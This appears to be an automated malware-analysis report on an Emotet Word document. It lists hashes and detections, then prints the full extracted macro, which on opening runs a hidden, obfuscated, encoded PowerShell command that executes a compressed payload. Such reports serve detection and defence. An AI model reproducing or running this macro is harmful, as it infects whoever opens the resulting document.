Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 0e9547de9d27606b…

MALICIOUS

Office (OLE)

Size: 105.2 KB
Created: 2018-06-01 15:24:00
Authoring application: Microsoft Office Word
First seen: 2018-06-21
MD5: b5f4c7ef4f7cb1437f646d765004c861
SHA-1: 76227755b5c5c719dd915fcfa4b718801b043e38
SHA-256: 0e9547de9d27606b1ec925088957f3adcdacd30f8b068463fa4f3ef06d20ef4e
Risk Score: 210

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The 'Autoopen' macro triggers a function that uses the 'Shell' command to execute a string. This string appears to be constructed to invoke PowerShell, likely for downloading and executing a secondary payload. The ClamAV detection explicitly names this as Emotet.

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-7076471-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7076471-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    vJoTVi = CSng(24059 * CInt(21349) + 42321 - 20765)
    cQRHVjb = JMOpKNranZ + Shell(QNYNQias + Chr(vbKeyP) + nMzwGJi + XnEFnBOVwi + dwfks + AiOanIujQCX + UVLbYB, wEjAvTYmnH + vbHide + PdHtwWd)
    wdvhzC = 59151 + Log(12880) - YZcIwO / Atn(29013) / RUbXNG / LBsrCN
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Function
    Sub Autoopen()
    On Error Resume Next
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9910 bytes
SHA-256: 901bded496991dc0ada89bc7c5cb8cd6d589b177ec22cd172db4e48a926e8b12
Script preview: first 1,000 lines of the extracted script
Attribute VB_Name = "PhFlrjYcnObvl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function cQRHVjb()
On Error Resume Next
SSJSv = 77174 + Log(21393) - HrVElF / Atn(90400) / HCRqz / rIjfTm
WDpOsr = CSng(39508 * CInt(47463) + 22249 - 86224)
WdzfzK = 39783 + Log(71442) - FbVpLN / Atn(70809) / AlQUYP / ojqtNa
vJoTVi = CSng(24059 * CInt(21349) + 42321 - 20765)
cQRHVjb = JMOpKNranZ + Shell(QNYNQias + Chr(vbKeyP) + nMzwGJi + XnEFnBOVwi + dwfks + AiOanIujQCX + UVLbYB, wEjAvTYmnH + vbHide + PdHtwWd)
wdvhzC = 59151 + Log(12880) - YZcIwO / Atn(29013) / RUbXNG / LBsrCN
PFmZlo = CSng(14156 * CInt(61915) + 76912 - 28071)
End Function
Sub Autoopen()
On Error Resume Next
jaWhf = 39856 + Log(14210) - VtBjK / Atn(72005) / PVwJm / jiJWW
cajlj = CSng(24504 * CInt(31062) + 63795 - 62076)
cQRHVjb
iWYkj = 84190 + Log(92247) - WboOY / Atn(72642) / ibDzsM / Iwism
VWuEq = CSng(11940 * CInt(83516) + 53948 - 71784)
End Sub


Attribute VB_Name = "UomwAvk"
Function nMzwGJi()
On Error Resume Next
KwzTia = 28712 + Log(33682) - LQpujh / Atn(20412) / jzWsd / QRipIo
XHWiqE = CSng(1805 * CInt(13241) + 43633 - 1292)
HEsYiU = "owe" + "rsHeLL -" + "e SQBOAH" + "YAb" + "wBLAG"
uFMvT = 46289 + Log(77046) - jQZPXj / Atn(64144) / jCDlG / vnISPp
JEKwIz = CSng(44712 * CInt(41967) + 40527 - 95913)
hkNAPmkaHwO = "UALQBFA" + "HgAUAByA" + "EUAcwBzAGkATwB" + "uACgAIABOA" + "EUAdwAt" + "AE8AYgBqAEUAQwB" + "UACAASQB" + "PAC4AQwB" + "vA"
BVIUw = 85330 + Log(97962) - JoUESP / Atn(14050) / KZnAI / KWLPQO
KuLEzj = CSng(71892 * CInt(39114) + 53026 - 78505)
DKiQEjmbZHP = "G0AUABSAEUAcw" + "BzAGkAbwBOAC" + "4AZABFAGYA" + "bABhAFQA" + "ZQBTAHQAcgB" + "lAE" + "EAbQA"
TUjnp = 99798 + Log(83417) - BfNwhw / Atn(96204) / KmIjc / IzuIzV
VzikXh = CSng(76962 * CInt(34279) + 44686 - 62968)
drXVb = "oAF" + "sAUwB5AFMA" + "dABFAG0ALgBJA" + "G8AL" + "gBNAEUA" + "TQBvAFIAeQBzAF" + "QAUgBFAGEAb" + "QBdACA" + "AWwBDAE" + "8ATgBWAEUAcgB"
XjNGw = 95158 + Log(57777) - zfbiT / Atn(10545) / jLhthA / DfhiM
PKlmF = CSng(93771 * CInt(22390) + 90926 - 43325)
wwiUY = "0AF0AOgA6A" + "EYAcgBvAG0" + "AYgBh" + "AFMARQA2" + "ADQA" + "cwB0AFIAaQBuAG" + "cAKAAgACcAVAB" + "aAEYAaAB" + "hAD" + "kAcwB3A"
CzisW = 600 + Log(89580) - Pijzc / Atn(70142) / zLBdhZ / lTspu
cWtsNJ = CSng(59936 * CInt(92380) + 5974 - 15046)
RkhLoN = "EUASQBhAC8A" + "RAAvAFkAZgB" + "SAEQAQwBWAG" + "oAQgB0AHA" + "AYgBkAGYAUgAxA"
CkSPhb = 34627 + Log(64650) - IGlJR / Atn(78127) / jMKAhG / mtkqk
FiwDC = CSng(51344 * CInt(94077) + 14090 - 6224)
mLFKFkPJi = "FEAegBTAE" + "8AZ" + "wBRA" + "GEAM" + "gBtAHoARAA" + "3AFoA" + "SwBPAGY" + "AYgBBAGkASwA3AF" + "UAVwBXAHoAYgAy" + "AE4AVQAwAFcAOAB"
saHtf = 43385 + Log(71665) - bYhvjs / Atn(14770) / wifVw / hOvaJh
qrVjI = CSng(35632 * CInt(50172) + 48946 - 25048)
twdFALki = "0ADkAMwA1ADIA" + "NQBzAGgAcg" + "BQAHYANQBPAGYA" + "dQAzAHQATQBGA" + "HYAdABPA" + "DUANwBuAEwAM" + "gBpAFIAMAB" + "KADcA" + "bgBuAEUAT" + "ABZADgA"
QHAPLl = 19196 + Log(96267) - wkdRc / Atn(64130) / HsszF / EckjM
bZhsj = CSng(9011 * CInt(28278) + 26783 - 91916)
qMqfRRRQr = "RQBmAHgAbgBXAD" + "YAQw" + "A3AFIAZgBs" + "AHIARAB3AD" + "QAZwBEAEQAMQB" + "tAHIAZgBWADU" + "AWABjAGYARAA0AC" + "sASQBDADQ"
VdlcF = 70806 + Log(44422) - ZszBL / Atn(64604) / PVDDXf / ZvWiOr
NNTLmW = CSng(29002 * CInt(21740) + 54838 - 13363)
kistNSKuMU = "AUgBCAHgAWgA" + "vAGsATAA4" + "AHMATwA1" + "AFoAUwBqAGUASQB" + "oAGkA" + "egBkA"
nMzwGJi = HEsYiU + hkNAPmkaHwO + DKiQEjmbZHP + drXVb + wwiUY + RkhLoN + mLFKFkPJi + twdFALki + qMqfRRRQr + kistNSKuMU
End Function
Function XnEFnBOVwi()
On Error Resume Next
FWHTP = 49251 + Log(28361) - MTjLKX / Atn(80507) / EqFbWf / MffqY
REswk = CSng(34923 * CInt(16290) + 46084 - 12104)
EwsMjZ = "GQAVwBBAHIATwB" + "iAE0AZwA1ADM" + "AYQBaAGwA" + "TQA" + "1ADYAaQBJAE4A"
zPOfad = 4675 + Log(17828) - wjKUWf / Atn(94654) / Dunji / puPqOZ
hSzKI = CSng(23924 * CInt(14396) + 1428 - 86553)
tXISWP = "WgBlAG8AMg" + "BaAHc" + "AWgArAGUAM" + "AB0AHMA"
cWDciG = 68964 + Log(42383) - nsEdS / Atn(92609) / ZZkKm / jhONMJ
SpZKM = CSng(20482 * CInt(25128) + 60078 - 25133)
WaTsNLd = "dABpAEoA" + "TgAzACs" + "AQgB5" + "AHoAMAA0AHYAVA" + "BrADcATwB6" + "AE0AQQA2AHU" + "AeABzAGsAQ"
nfUwm = 25884 + Log(55418) - fOumiQ / Atn(66156) / pnWNQt / IwzTtR
jiMOz = CSng(59647 * CInt(34328) + 82682 - 94101)
oKCTuiIURhf = "wBJ" + "AGMASABm" + "AHY" + "AaQB" + "rAEEAbQBrAHUARg"
mYhvS = 61273 + Log(14772) - cQVaJ / Atn(98531) / tFMwpu / YXfLaT
DiwqC = CSng(53409 * CInt(85670) + 23517 - 59413)
fLifjrG = "BSAGMAb" + "ABJAG0ANg" + "BPAHYAcQBT" + "AHYAcA" + "BTADMAVgB4AGY" + "AMwA2A" + "E4ANABTADMAOQ" + "BHAC8" + "AVQBrA" + "GcAVwBxAG"
SpJRBm = 17476 + Log(49719) - UDZFs / Atn(14993) / CAKPH / oqZmX
HXBhaX = CSng(60336 * CInt(98801) + 70325 - 34435)
sXvMlji = "oAdQA2AEgATwBO" + "ADgANQA" + "yAEcAQgBMAD" + "MAYQAxADUATQB6A" + "EoAZQBwAEcA" + "aABWA" + "DQAMABCA"
kWlNw = 29355 + Log(57558) - FicYs / Atn(3535) / iNBTs / OZSpT
wiNIp = CSng(71223 * CInt(55853) + 49008 - 86609)
TwqDOn = "GQAVQBwA" + "FYAdQBSADgAdABK" + "ADU" + "AUwAyA" + "E0AKwBRADIAd" + "QAx"
spbvN = 35213 + Log(2994) - wIfLpR / Atn(95965) / ZIWzT / ftfqr
nnPcW = CSng(24293 * CInt(40501) + 22768 - 85317)
flauDM = "AEsA" + "UwBRAFcAVg" + "BnADMARwBhAFoA" + "cgBNAH" + "oAbABOADAAdgBs"
XnEFnBOVwi = EwsMjZ + tXISWP + WaTsNLd + oKCTuiIURhf + fLifjrG + sXvMlji + TwqDOn + flauDM
End Function
Function dwfks()
On Error Resume Next
BwXorK = 81825 + Log(75910) - vKXLUD / Atn(91786) / UKhQW / brKtDp
wmYcGZ = CSng(49350 * CInt(59210) + 61896 - 40138)
WjwjlwNz = "ADI" + "AcAAwAFQ" + "AO" + "ABOAGwAUQBXAG" + "cA" + "QQBkAG" + "MARQBTAG0" + "AagBW" + "ADkANAAvAEoAWg" + "BIAEcATABSADE"
rzwPP = 54901 + Log(89384) - aKABK / Atn(63310) / WwzjQn / QwYziO
WXopfY = CSng(48206 * CInt(57490) + 23547 - 53160)
UfQvdLPki = "AKwBuADcALwA4AH" + "YAWAA2" + "AEcAbgA" + "wAGYAT" + "AA4" + "AHIAMgBTADAASgA" + "1AHcAVwA"
ziOSwk = 27588 + Log(92147) - DdhzEP / Atn(86923) / wqQujv / mLLiI
sjVwR = CSng(17476 * CInt(69312) + 96656 - 3141)
zjDknLPCCE = "xAE0ATQBPADMAV" + "wBiAF" + "IAMwBVADMAZ" + "ABoADIAMAAvAFcA" + "QwBqAFQ" + "AcABuAFEAZw"
kmmasp = 78752 + Log(71988) - frfVL / Atn(77221) / iJflY / nVLtMB
GJiwDf = CSng(14695 * CInt(87623) + 40746 - 23274)
SKXhY = "Ar" + "AEkA" + "ag" + "BqADgATwBrA" + "DQAbwBRAHU" + "AeQBmAG4" + "AUABaAF"
WaOdNM = 27833 + Log(19426) - waaSQ / Atn(29343) / zQOwd / zJWJjS
jZNzjP = CSng(96256 * CInt(39441) + 19177 - 15495)
dhwij = "AAQwA5AEwAW" + "gAxAGoARQArAEE" + "AK" + "wBPADcALwA3AHUA" + "SQBp" + "AFkARQBsADYAU" + "gA5AFMAM"
fCrnjj = 31308 + Log(62256) - dIcGNS / Atn(67651) / EHEcwi / ZMcjAR
pIPTbv = CSng(22038 * CInt(57550) + 74963 - 86142)
JIIsr = "AB1" + "AHgAbQB" + "MAEsAc" + "QBlAC8AR"
dwfks = WjwjlwNz + UfQvdLPki + zjDknLPCCE + SKXhY + dhwij + JIIsr
End Function
Function AiOanIujQCX()
On Error Resume Next
iCYwH = 69686 + Log(31115) - WPCDWj / Atn(46136) / OTGjf / wTUqu
oQaULZ = CSng(34403 * CInt(53800) + 10290 - 55487)
DGrGlVBEBD = "QBpADAAT" + "gAzAEs" + "ATQBPAGQAW" + "gBmADQAS" + "ABoAEgAdABy"
sTUuR = 74198 + Log(10327) - jDjzKj / Atn(23200) / HFEcQ / YsGoir
RwJlOO = CSng(25704 * CInt(21367) + 53844 - 60476)
svTzM = "AGQAbgBqAFkA" + "bABCACsATQA2AG0" + "ALwBzAHkAKw" + "A2A"
OzKnHS = 32068 + Log(77173) - CKWAAo / Atn(4457) / cocEOw / HXLvR
MfZXNS = CSng(60123 * CInt(72060) + 70517 - 76408)
SznOMwQvKs = "HoAegB5AFUA" + "MQBXADIAcwBF" + "AHIASwBnAGY" + "AMwBkAFEAc" + "AB0ADUAcgBMAFo" + "AMAAwAEMARQB"
uruHZ = 16499 + Log(70802) - MSinC / Atn(54524) / ArfkH / WBpiw
nVXIrA = CSng(9234 * CInt(19917) + 43761 - 4744)
FCRmFb = "4ADQAeAA2AGgA" + "Lw" + "BFAFIATgByA" + "GcAaAB5AFoAdQBh" + "AE8AcQB4AHA" + "AdQBYAFoASQBKAD" + "AAQgB0AEsAOQB" + "5AHQAZQBD" + "AFcA" + "WAA"
iOaWF = 61001 + Log(57046) - XvMSnF / Atn(1023) / DXqEcc / zDpKqn
RiwjzV = CSng(61595 * CInt(97694) + 32922 - 41378)
WjZsoU = "yAEgA" + "YwBkAEgA" + "NAB3" + "AEcAV" + "QArAHcAU" + "ABoADkA" + "OAA9ACcAK" + "QAsACAAWwBTAHk" + "AcwB" + "0AEUATQAu"
mZhaD = 68478 + Log(6331) - TBmjwi / Atn(11328) / dSQVmE / diTHI
AEGUsq = CSng(5300 * CInt(97393) + 44320 - 99891)
qqDlIDrZY = "AG" + "kA" + "bwAuAGMAT" + "wBtAFAAUg" + "BlAFMA" + "UwBpAE8ATgA" + "uAEMAbwBtAFAAc" + "gBFAHM"
GzTwf = 94959 + Log(432) - rmCjBz / Atn(49070) / ADrkcv / SzjMG
DkGSKO = CSng(75221 * CInt(69864) + 55934 - 96830)
LIBrmtBNHu = "AUwBJAG8ATg" + "BtAE8ARABlAF0AO" + "gA6A" + "EQARQBj" + "AG" + "8ATQBQA" + "FI" + "ARQBTAFM"
TJQswX = 10480 + Log(39874) - HCvfP / Atn(56202) / nAwwl / EoCwOq
mzXFGQ = CSng(35900 * CInt(58920) + 37463 - 40242)
aDoTI = "AKQAgAHw" + "ARgBPAH" + "IAZQBhAEMAS" + "AAtAG8AQg" + "BqAEUAYwB0"
arnkA = 79293 + Log(52440) - hDzji / Atn(98934) / ZEcqBJ / jjJip
zKjUj = CSng(48306 * CInt(46229) + 88457 - 12839)
NFqGUtNujC = "ACAAewAgAE4AR" + "QB3AC0AT" + "wBiAGoA" + "RQBDAFQ" + "AIABp" + "AE8ALgBzAFQAc" + "gBlAGEAb" + "QBSAGUAQQBk" + "AEUAUg" + "AoACQ"
AiOanIujQCX = DGrGlVBEBD + svTzM + SznOMwQvKs + FCRmFb + WjZsoU + qqDlIDrZY + LIBrmtBNHu + aDoTI + NFqGUtNujC
End Function
Function UVLbYB()
On Error Resume Next
nMVLJ = 64829 + Log(74660) - tFGrN / Atn(4986) / TQLHHa / zDDWW
DFbFSk = CSng(77682 * CInt(56591) + 62677 - 95626)
Xwirfi = "AXwAgACwAWwBz" + "AHkAUwB" + "UAEUAbQ" + "AuAFQARQBYAF" + "QALgBlAG4AYw" + "BPAEQASQ" + "BOA"
Ctvlj = 33385 + Log(14638) - iqMIMm / Atn(98703) / RNSImL / LniBY
OzmSGF = CSng(26964 * CInt(60541) + 69142 - 29785)
PowEw = "GcAXQA6ADo" + "AQQBTAEMAaQBpAC" + "AA" + "KQAgAH0A"
vZroqw = 29520 + Log(37423) - rWPOp / Atn(36406) / mjwFQi / QraqF
lNhwjM = CSng(24642 * CInt(37546) + 36111 - 40200)
SAoTarwrj = "IAApAC4AUgBlA" + "GEAR" + "ABUAG8ARQBuAEQ" + "AKAAgACkA"
UVLbYB = Xwirfi + PowEw + SAoTarwrj
End Function